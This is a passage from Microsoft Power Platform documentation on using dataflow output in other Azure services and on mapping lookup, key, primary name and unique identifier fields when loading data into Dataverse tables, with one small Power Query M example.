helps other services and applications to use this data. This also makes it easier for the
data transformation dataflows to get data from the analytical ingestion dataflow. To
learn more, go to Analytical dataflows.
Using the output of Microsoft Power
Platform dataflows from other Azure
data workloads
Article • 02/17/2023

Depending on the storage for the output of the Microsoft Power Platform dataflows,
you can use that output in other Azure services.

The benefits of working with the output of Power Platform dataflows
Using Power Platform dataflows, you can reshape, clean, and prepare data for further
analysis and consumption. Many other Azure data services can take that data as an input
and perform further actions on it.

Azure Machine Learning can consume the output of dataflows and use it for
machine learning scenarios (for example, predictive analysis).
Azure Data Factory can get the output of dataflows on a much larger scale,
combined with the data from big data sources, for advanced data integration
solutions.
Azure Databricks can consume the output of dataflows for applied data science
algorithms and further AI with the big data scale in the Apache Spark back end.
Other Azure data services can use the output of Power Platform dataflows to do
further actions on that data.

Dataflows with external Azure Data Lake Storage
If you've connected an external Azure Data Lake Storage account to the Power Platform
dataflows, you can connect to it using any Azure services that have Azure Data Lake
Storage as a source, such as Azure Machine Learning, Azure Data Factory, Azure
Databricks, and Azure Analysis Services.

In any of these services, use Azure Data Lake Storage as the source. You'll be able to
enter the details of your storage and connect to the data in it. The data is stored in CSV
format, and is readable through any of these tools and services. The following
screenshot shows how Azure Data Lake Storage is a source option for Azure Data
Factory.

Dataflows with Dataverse


If you're using standard dataflows that store the data in Dataverse, you can still connect
to Dataverse from many Azure services. The following image shows that in Azure Data
Factory, the output of a dataflow from Dataverse can be used as a source.

Dataflows with internal Azure Data Lake Storage
When you use the internal Data Lake storage that's provided by Power Platform
dataflows, that storage is exclusively limited to the Power Platform tools and isn't
accessible from other Azure data workloads.
Mapping fields with relationships in
standard dataflows
Article • 06/20/2023

In the standard dataflow, you can easily map fields from the dataflow query into
Dataverse tables. However, if the Dataverse table has lookup or relationship fields,
additional consideration is required to make sure this process works.

What is a relationship and why do you need one?
If you're coming from a database development background, you're familiar with the
concept of a relationship between tables. However, many users of Microsoft Power
Platform services aren't coming from that background. You might wonder what the
relationship is, or why you should create a relationship between tables.

Tables and their relationships are fundamental concepts of database design. A complete
discussion of relationships is beyond the scope of this article, but we'll cover them in a
general way here.

Let's say you want to store information about customers and their details, including
region, in Dataverse. You can keep everything in one table. Your table can be called
Customers, and it can contain fields, such as CustomerID, Name, Birthdate, and Region.
Now imagine that you have another table that also has the store's information. This
table can have fields, such as Store ID, Name, and Region. As you can see, the region is
repeated in both tables. There's no single place where you can get all regions; some of
the region's data is in the Customers table, and some of it is in the Stores table. If you
ever build an application or a report from this information, you always have to combine
the two regions' information into one.
In standard database design practice, you create a separate table for Region in scenarios
like the one described above. This Region table would have a Region ID, Name, and
other information about the region. The other two tables (Customers and Stores) will
have links to this table using a field (which can be Region ID if we have the ID in both
tables, or Name if it's unique enough to determine a region). This means having a
relationship from the Stores and Customers table to the Region table.

In Dataverse, there are a number of ways to create a relationship. One way is to create a
table, and then create a field in one table that's a relationship (or lookup) to another
table, as described in the next section.

What are lookup or relationship fields?


In Dataverse, you can have a field defined as a lookup field, which points to another
table.
In the preceding image, the Region field is a lookup field to another table named Region
Lookup. To learn more about different types of relationships, go to Create a relationship
between tables.

When the field mapping doesn't show the relationship fields
If you've created a lookup field in one table that points to another table, that field might
not appear in the mapping of the dataflow. That’s because the target entity involved in
the relationship requires a Key field to be defined. This best practice would then make
sure that the field is mappable in the table mappings of the dataflow.
Setting the Key field in the table
To set the key field in the table, go to the Keys tab, and add a key to a field that has
unique values.

After setting the key field, you can see the field in the mapping of the dataflow.

Known limitations
Mapping to polymorphic lookup fields is currently not supported.
Mapping to a multi-level lookup field, a lookup that points to another table's lookup field, is currently not supported.
Lookup fields for Standard Tables, unless they contain alternate key fields as
described in this document, won't show up in the Map Tables dialog.
Dataflows don't guarantee correct loading order when loading data to tables
configured as hierarchical data structures.
The order of query execution, or loading order to Dataverse tables isn't
guaranteed. We recommend that you separate child and parent tables into two
dataflows, and first refresh the dataflow containing child artifacts.
Field mapping considerations for
standard dataflows
Article • 06/20/2023

When loading data into Dataverse tables, you'll need to map the source query's columns
in the dataflow's editing experience to the destination Dataverse table columns. Beyond
mapping of data, there are other considerations and best practices to take into account.
In this article, we cover the different dataflow settings that control the behavior of
dataflow refresh and as a result, the data in the destination table.

Controlling whether dataflows create or upsert records each refresh
Each time you refresh a dataflow, it will fetch records from the source and load them
into Dataverse. If you run the dataflow more than once—depending on how you
configure the dataflow—you can:

Create new records each dataflow refresh, even if such records already exist in the
destination table.
Create new records if they don't already exist in the table, or update existing
records if they already exist in the table. This behavior is called upsert.

Using a key column will indicate to the dataflow to upsert records into the destination
table, while not selecting a key will always create new records in the destination table.

A key column is a column that's unique and deterministic of a data row in the table. For
example, in an Orders table, if the Order ID is a key column, you shouldn't have two
rows with the same Order ID. Also, one Order ID—let's say an order with the ID 345—
should only represent one row in the table. To choose the key column for the table in
Dataverse from the dataflow, you need to set the key field in the Map Tables experience.

Choosing a primary name and key field when creating a new table
The following image shows how you can choose the key column to be populated from
the source when you create a new table in the dataflow.
The primary name field that you see in the field mapping is for a label field; this field
doesn't need to be unique. The field that's used in the table for checking duplication will
be the field that you set in the Alternate Key field.

Having a primary key in the table ensures that even if you have duplicate data rows with
the same value in the field that's mapped to the primary key, the duplicate entries won't
be loaded into the table, and the table will always maintain high data quality. Having a
table with high-quality data is essential for building reporting solutions based on the table.

The primary name field


The primary name field is a display field used in Dataverse. This field is used in default
views to show the content of the table in other applications. This field isn't the primary
key field, and shouldn't be considered as that. This field can have duplicates, because it's
a display field. The best practice, however, is to use a concatenated field to map to the
primary name field, so the name is fully explanatory.

The alternate key field is what is used as the primary key.
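A small sketch of building such a concatenated display name in M before mapping it to the primary name field. The query and column names are only examples; note that Text.Combine skips null values, which keeps the label readable when parts are missing.

```powerquery-m
let
    Source = StagedCustomers,
    // Build a descriptive label to map to the Dataverse primary name field
    AddedDisplayName = Table.AddColumn(
        Source,
        "CustomerDisplayName",
        each Text.Combine({[FirstName], [LastName], [City]}, " - "),
        type text
    )
in
    AddedDisplayName
```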

Choosing a key field when loading to an existing table


When mapping a dataflow query to an existing Dataverse table, you can choose if and
which key should be used when loading data into the destination table.

The following image shows how you can choose the key column to be used when
upserting records to an existing Dataverse table:


Setting a table’s Unique ID column and using it as a key
field for upserting records into existing Dataverse tables
All Microsoft Dataverse table rows have unique identifiers defined as GUIDs. These
GUIDs are the primary key for each table. By default, a table's primary key can't be set by
dataflows, and is auto-generated by Dataverse when a record is created. There are
advanced use cases where leveraging the primary key of a table is desirable, for
example, integrating data with external sources while keeping the same primary key
values in both the external table and Dataverse table.

7 Note

This capability is only available when loading data to existing tables.


The unique identifier field only accepts a string containing GUID values; any
other data type or value will cause record creation to fail.

To take advantage of a table’s unique identifier field, select Load to existing table in the
Map Tables page while authoring a dataflow. In the example shown in the image below,
we would like to load data into the CustomerTransactions table, and use the
TransactionID column from the data source as the unique identifier of the table.

You'll notice that in the Select key dropdown, the unique identifier—